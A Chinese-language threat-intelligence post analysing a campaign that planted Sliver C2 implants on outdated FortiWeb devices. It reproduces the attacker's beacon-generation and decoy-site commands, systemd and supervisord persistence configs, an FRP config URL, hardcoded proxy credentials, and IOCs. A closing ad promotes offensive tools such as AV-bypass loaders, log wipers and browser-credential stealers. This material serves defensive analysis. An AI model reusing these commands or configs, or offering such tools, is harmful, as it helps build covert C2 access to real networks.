文章总结： 本文深入分析了一起利用FortiWeb设备漏洞部署SliverC2的攻击事件。攻击者通过React2Shell（CVE-2025-55182）等漏洞入侵，使用FRP和microsocks工具建立代理，并通过systemd服务等方式实现持久化。受害者遍及多国，包括金融和政府组织。文章强调了边缘设备因缺乏EDR等安全软件而面临的高风险。 综合评分： 90 文章分类： 渗透测试,恶意软件,应急响应,网络安全,实战经验

EDR 在哪里？从防火墙运行的 Sliver C2 攻击分析

原创

星夜AI安全 星夜AI安全

星夜AI安全

2026年1月3日 08:14 吉林

在小说阅读器读本章

去阅读

📌各位可以将公众号设为星标⭐

📌这样就不会错过每期的推荐内容啦~

📌这对我真的很重要！

📌1. 本平台分享的安全知识和工具信息源于公开资料及专业交流，仅供个人学习提升安全意识、了解防护手段，禁止用于任何违法活动，否则使用者自行承担法律后果。

📌2. 所分享内容及工具虽具普遍性，但因场景、版本、系统等因素，无法保证完全适用，使用者要自行承担知识运用不当、工具使用故障带来的损失。

📌3. 使用者在学习操作过程中务必遵守法规道德，面对有风险环节需谨慎预估后果、做好防护，若未谨慎操作引发信息泄露、设备损坏等不良后果，责任自负。

引言

在 Censys 平台进行日常的开放目录威胁狩猎过程中，我们留意到一名威胁行为者意外暴露了 Sliver C2 的数据库及日志等信息。通过深入剖析这些数据库、日志及其关联的基础设施，我们判定该威胁行为者已成功利用多台 FortiWeb 设备部署了 Sliver。不仅如此，该组织还借助 React2Shell (CVE-2025-55182) 漏洞来部署 Sliver，并运用快速反向代理 (FRP) 工具将受害主机的本地服务远程暴露出来。

您可以通过 Censys 或 Shodan 快速搜索活跃的开放目录，从而发现类似的暴露基础设施，尽管它们可能不够稳定且会迅速下线。若我没记错，Hunt.io 是目前唯一持续对恶意开放目录进行归档的平台。需要指出的是，本研究所提及的部分开放目录已在该平台存档。虽然我们不会透露受害者信息或从开放目录中获取的全部文件，但这些数据在 Hunt.io 平台上均可查阅。

初始入侵

现有证据表明，该威胁组织通过利用面向公众的漏洞取得了初始访问权限，随后将 Sliver C2 部署到受害主机上。威胁行为者利用了 React2Shell (CVE-2025-55182) 漏洞，同时还入侵了大量 FortiWeb 设备。由于我们未能获得相关的概念验证代码，因此用于入侵 FortiWeb 设备的具体漏洞尚不清楚，不过这些设备均已超过有效期。

命令与控制

Sliver C2

| C2 域名 | 注册日期 | C2 IP | ASN | | — | — | — | — | | ns1.ubunutpackages.store | 2025-12-26 | 195.20.17.253 (活跃 – 31/12/25) | 62005 | | ns1.bafairforce.army | 2025-09-24 | 193.233.201.12 (活跃 – 31/12/25) | 62005 | | ns1.bafairforce.army | 2025-09-24 | 45.150.108.43 (历史) | 62005 | | ns1.bafairforce.army | 2025-09-24 | 80.78.18.142 (历史) | 39287 | | ns1.bafairforce.army | 2025-09-24 | 192.81.210.81 (历史) | 14061 |

根据对 C2 数据库和日志的梳理，运行在 ns1.ubunutpackages[.]store 上的 Sliver C2 实例创建于 2025年12月22日 07:04 UTC。向该 Sliver C2 实例发送信标进行回连的受害主机，多数是已过期的 FortiWeb 设备。此外，威胁行为者还为此域名搭建了一个伪装成 “Ubuntu Packages” 的网站：

generate beacon --http  ns1.ubunutpackages.store --reconnect 120 --strategy r --template ubuntu --os linux --evasion --save ./system-updater --seconds 60
websites add-content --website ubuntupackages --web-path / --content /root/dom/ubuntu-packages.html
https --domain ns1.ubunutpackages.store --cert /root/dom/cert.pem --key /root/dom/key.pem --website ubuntupackages

Sliver C2 域名 ns1.bafairforce[.]army 同样设置了“诱饵”页面，伪装成“加入孟加拉国空军”的官方网站。

generate beacon --http  ns1.bafairforce.army --reconnect 120 --strategy r --template ubuntu --os linux --evasion --save ./system-updater --seconds 60
websites add-content --website ipcheck --web-path / --content /home/user1/web/index.html
websites add-content --website ARMED_FORCES_DIVISION --web-path / --content /root/website-bd/index.html
https --domain ns1.bafairforce.army --cert /root/website-bd/cert.pem --key /root/website-bd/key.pem --website ARMED_FORCES_DIVISION

选择伪装成孟加拉国空军并非偶然，这属于一种战略考量，因为向域名 bafairforce[.]army 回连信标的多个受害者很可能来自孟加拉国的各类组织。

Sliver 植入程序

| 创建日期 | 植入程序名称 | C2 域名 | 哈希 | | — | — | — | — | | 2025年12月10日 12:34 | DECENT_WATERBED | testing.caai.in | 4086057b9a0f9898c07318e093814ae9cfdaaf6ad71a45b2d0d4cd75e57f9354 | | 2025年12月22日 07:03 | ESTIMATED_FOOT | testing.caai.in | 964473ffbd593fc52a779b1d699c79cc66b459cf842c2e6221703e2e6a2322c0 | | 2025年12月22日 07:04 | DAMAGED_COPYRIGHT | ns1.bafairforce.army | 172a9ee9601ef0eb6fbd2676742edfb201c10369712dbf721e5d105aa1320a32 | | 2025年12月22日 07:04 | ELEGANT_GO-KART | ns1.bafairforce.army | 3c24f30f2ca89d408d42293cab8fbb81cb9c2b0801074ef40f0a79770dac5956 | | 2025年12月26日 10:45 | ARTIFICIAL_SUPPORT | ns1.ubunutpackages.store | 2897ee24de4cca2a4c6a085cf6fdccb6a89c6c23978529d81b4f4e6db46b0b96 |

FortiWeb 上的 Sliver

我们发现从版本 5.4.202 到 6.1.62 的 FortiWeb 设备均被入侵。Sliver 二进制文件被部署在路径 /bin/.root/system-updater。

值得注意的是，我们还观察到 1 台与 FortiWeb 无关的中国“受害”主机，其部署路径为 /app/web/system-updater。

| 首次信标 | 植入程序名称 | 操作系统 | 架构 | 国家 | 二进制路径 | 操作系统版本 | | — | — | — | — | — | — | — | | 2025年12月29日 05:07:13 | ARTIFICIAL_SUPPORT | linux | amd64 | US | /bin/.root/system-updater | Linux FortiWeb 5.4.202 | | 2025年12月29日 05:20:44 | ARTIFICIAL_SUPPORT | linux | amd64 | SA | /bin/.root/system-updater | Linux FortiWeb 5.4.202 | | 2025年12月29日 05:58:59 | ARTIFICIAL_SUPPORT | linux | amd64 | US | /bin/.root/system-updater | Linux FortiWeb 6.1.62 | | 2025年12月29日 06:03:59 | ARTIFICIAL_SUPPORT | linux | amd64 | IN | /bin/.root/system-updater | Linux FortiWeb 5.4.202 | | 2025年12月29日 06:11:25 | ARTIFICIAL_SUPPORT | linux | amd64 | US | /bin/.root/system-updater | Linux fweb-nt-fwb 6.1.62 | | 2025年12月29日 06:47:57 | ARTIFICIAL_SUPPORT | linux | amd64 | ZA | /bin/.root/system-updater | Linux FortiWeb 5.4.202 | | 2025年12月29日 06:53:55 | ARTIFICIAL_SUPPORT | linux | amd64 | US | /bin/.root/system-updater | Linux FortiWeb 6.1.62 | | 2025年12月29日 07:06:20 | ARTIFICIAL_SUPPORT | linux | amd64 | US | /bin/.root/system-updater | Linux FortiWeb 6.1.62 | | 2025年12月29日 07:10:39 | ARTIFICIAL_SUPPORT | linux | amd64 | IN | /bin/.root/system-updater | Linux FortiWeb 5.4.20229/12/25 07:16:37 | | 29/12/25 12:45:05 | ARTIFICIAL_SUPPORT | linux | amd64 | CN | /app/web/system-updater | Linux a19f1ef3ded0 6.13.7-orbstack-00283-g9d1400e7e9c6 |

Sliver 持久化

攻击者利用 Systemd 服务 (T1543.002) 和修改系统进程 (T1543) 等技术，在 Linux 主机上建立了持久化机制。

更新器服务

[Unit]
Description=Updater Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/.root/system-updater

# Restart behavior
Restart=on-failure
RestartSec=5
[...已删减...]
# Logging
StandardOutput=journal
StandardError=journal

[Install]
WantedBy=multi-user.target

一个名为 updater.service 的文件在可公开访问的目录中被找到，这是用于持久化的 systemd 服务配置文件。

Supervisord

[supervisord]
nodaemon=true

[program:rootbinary]
command=/bin/.root/system-updater
autostart=true
autorestart=true

此外，攻击者还修改了 supervisor.conf 文件，以确保 Sliver C2 能持续运行。

代理基础设施

FRP

在将 Sliver C2 植入受害主机后，攻击者利用该框架进一步部署了代理工具。快速反向代理 (FRP) 被大量使用。

我们发现该工具及其配置文件托管在 hXXp://45.83.181[.]160:8003/frpc.toml，并被下载到受害主机。FRP 服务器 (frps) 的日志显示有多个活跃受害者。

我们可以将 Sliver 数据库中记录的受害者 IP 地址与 FRP 服务器的日志进行关联验证。

microsocks

除了 FRP，攻击者还使用了名为 microsocks 的开源工具，该工具以 cups-lpd 为文件名进行投放。分析该二进制文件后发现，它会在端口 515 上提供 SOCKS 服务，而这个端口恰好是 Linux 系统中合法的 CUPS 行式打印机守护进程的默认监听端口：

这项 microsocks 服务也曾通过 Systemd 服务来维持持久化：

[Unit]
Description=Updater Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/.root/cups-lpd
[...已删减...]

从信标数据库中可以发现，在 Censys 上能够找到运行在 FortiWeb 主机端口 515 上的暴露 SOCKS 服务：

值得注意的是，尽管在上述案例中没有被使用，但该工具包含了硬编码的凭据 Monkhood6703:64d9cb9c5f075dfaa371a6f。如果 cups-lpd 服务运行时使用了 -1/-w 开关，这些凭据就能生效。

受害者情况

从恢复的 C2 数据库来看，在排除误报和沙箱主机名后，共有 30 个独立的 IP 地址曾进行信标回连。在巴基斯坦和孟加拉国发现了多个受害者，其中涉及金融和政府部门的组织机构。

结论

这些攻击事件凸显了使用 FortiWeb 等边缘设备的组织在可见性和遥测方面存在显著的盲区。在本案例中，我们之所以能获得潜在入侵的证据，仅仅是因为操作员留下了暴露的 Sliver 日志和数据库。这类设备通常没有内置的 AV/EDR 功能，我们也未听说有人自行安装此类防护。这使得在设备上开展充分且有效的威胁狩猎变得极为困难。

尽管首个 C2 域名在三个月前就已注册，但恢复的数据显示，在短短八天内（2025-12-22 至 2025-12-30），就有 30 台独立且真实的主机被纳入控制。使用孟加拉国主题的诱饵页面和 C2 基础设施，与数据库中发现的部分孟加拉国受害者情况相符，这表明该行动具有明确的针对性，而非机会主义行为。最后，使用重命名的 microsocks 二进制文件 (cups-lpd) 绑定到端口 515 以伪装成 CUPS 服务，并通过 FortiWeb 设备上的 Systemd 服务运行，突显了攻击者为隐藏踪迹并实现持久化所采取的努力。

IOC 指标

载荷/工具

| 类型 | 名称 | SHA256 | 创建日期 | 备注 | | — | — | — | — | — | | Sliver 植入程序 | DECENT_WATERBED | 4086057b9a0f9898c07318e093814ae9cfdaaf6ad71a45b2d0d4cd75e57f9354 | 10/12/25 12:34 | C2: testing.caai[.]in | | Sliver 植入程序 | ESTIMATED_FOOT | 964473ffbd593fc52a779b1d699c79cc66b459cf842c2e6221703e2e6a2322c0 | 22/12/25 07:03 | C2: testing.caai[.]in | | Sliver 植入程序 | DAMAGED_COPYRIGHT | 172a9ee9601ef0eb6fbd2676742edfb201c10369712dbf721e5d105aa1320a32 | 22/12/25 07:04 | C2: ns1.bafairforce[.]army | | Sliver 植入程序 | ELEGANT_GO-KART | 3c24f30f2ca89d408d42293cab8fbb81cb9c2b0801074ef40f0a79770dac5956 | 22/12/25 07:04 | C2: ns1.bafairforce[.]army | | Sliver 植入程序 | ARTIFICIAL_SUPPORT | 2897ee24de4cca2a4c6a085cf6fdccb6a89c6c23978529d81b4f4e6db46b0b96 | 26/12/25 10:45 | C2: ns1.ubunutpackages[.]store | | 代理二进制文件 | cups_lpd | dafc7517669e931de858464966af995c44c2e7c6bdf684d53c54d6503cd48a38 | — | “microsocks” 代理，端口 515 ；凭据：Monkhood6703:64d9cb9c5f075dfaa371a6f## 网络 |

| 类型 | 指标 | 备注 | | — | — | — | | URL / C2 | https://ns1.ubunutpackages[.]store | 该 URL 针对 FortiWeb 实例；流量源自 195.20.17[.]253；域名于 2025-12-26 注册 | | URL / C2 | https://ns1.bafairforce[.]army | 该 URL 针对 FortiWeb 及 React2Shell；流量源自 193.233.201[.]12；域名于 2025-09-24 注册 | | IP | 193.233.201[.]12 (AS 62005) | 运行 Sliver C2；观察到存在开放目录 | | IP | 195.20.17[.]253 (AS 62005) | 运行 Sliver C2；观察到存在开放目录 | | IP | 45.150.108[.]43 (AS 62005) | 运行 Sliver C2 | | IP | 45.143.167[.]7 (AS 62005) | 运行 Sliver C2；观察到存在开放目录 | | IP | 80.78.18[.]142 (AS 39287) | 运行 Sliver C2 | | IP | 192.81.210[.]81 (AS 14061) | 运行 Sliver C2 | | IP | 45.83.181[.]160 (AS 44559) | 快速反向代理 (FRP) 服务器；观察到存在开放目录 |

| C2 域名 | 注册日期 (报告) | C2 IP | 状态/备注 | ASN | | — | — | — | — | — | | ns1.ubunutpackages[.]store | 2025-12-26 | 195.20.17[.]253 | 活跃 (31/12/25) | 62005 | | ns1.bafairforce[.]army | 2025-09-24 | 193.233.201[.]12 | 活跃 (31/12/25) | 62005 | | ns1.bafairforce[.]army | 2025-09-24 | 45.150.108[.]43 | 历史 | 62005 | | ns1.bafairforce[.]army | 2025-09-24 | 80.78.18[.]142 | 历史 | 39287 | | ns1.bafairforce[.]army | 2025-09-24 | 192.81.210[.]81 | 历史 | 14061 |

EDR 在哪里？Sliver C2 正在从防火墙运行

免责声明：本博客文章仅用于教育和研究目的。提供的所有技术和代码示例旨在帮助防御者理解攻击手法并提高安全态势。请勿使用此信息访问或干扰您不拥有或没有明确测试权限的系统。未经授权的使用可能违反法律和道德准则。作者对因应用所讨论概念而导致的任何误用或损害不承担任何责任。

关注微信公众号后台回复入群 即可加入星夜AI安全交流群

圈子介绍

现任职于某头部网络安全企业攻防研究部，核心红队成员。2021-2023年间累计参与40+场国家级、行业级攻防实战演练，精通漏洞挖掘、红蓝对抗策略制定、恶意代码分析、内网横向渗透及应急响应等技术领域。在多次大型演练中，主导突破多个高防护目标网络，曾获“最佳攻击手”“突出贡献个人”等荣誉。

已产出的安全工具及成果包括：

• 多款主流杀软通杀工具（兼容卡巴斯基、诺顿、瑞星、360等终端防护）
• 全自动信息收集平台（集成资产测绘、端口扫描、指纹识别及漏洞探针）
• 内网穿透套件（适配多层路由、隔离网络环境的隐蔽流量转发）
• 权限维持工具集（含注册表、系统服务、进程隐藏等多维持久化方案）
• 哥斯拉/冰蝎定制化马生成器（绕过主流终端防护与EDR动态检测）
• 日志清理工具（实现Windows/Linux系统关键日志无痕删除与篡改）
• 浏览器凭证窃取工具（支持Chrome/Edge/Firefox等主流浏览器数据提取）
• 企业VPN漏洞利用工具（适配多款商用VPN设备的漏洞探测与利用）
• 工控系统专用扫描器（针对SCADA、PLC等工控设备的安全检测与指纹识别）
• 邮件钓鱼平台（集成模板生成、钓鱼追踪、数据统计全流程功能）
• 社工信息聚合工具（整合多平台公开信息检索与关联分析能力）
• 二开fscan内网扫描工具（增强指纹精度、弱口令爆破与结果标准化输出）
• 多款免杀Webshell集合（覆盖PHP/JSP/ASPX，过主流WAF与终端防护）
• 免杀360专属加载器（支持Shellcode内存执行，绕过360全系防护检测）

后续将不断更新到内部圈子中 欢迎加入圈子

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：星夜AI安全 星夜AI安全 星夜AI安全《EDR 在哪里？从防火墙运行的 Sliver C2 攻击分析》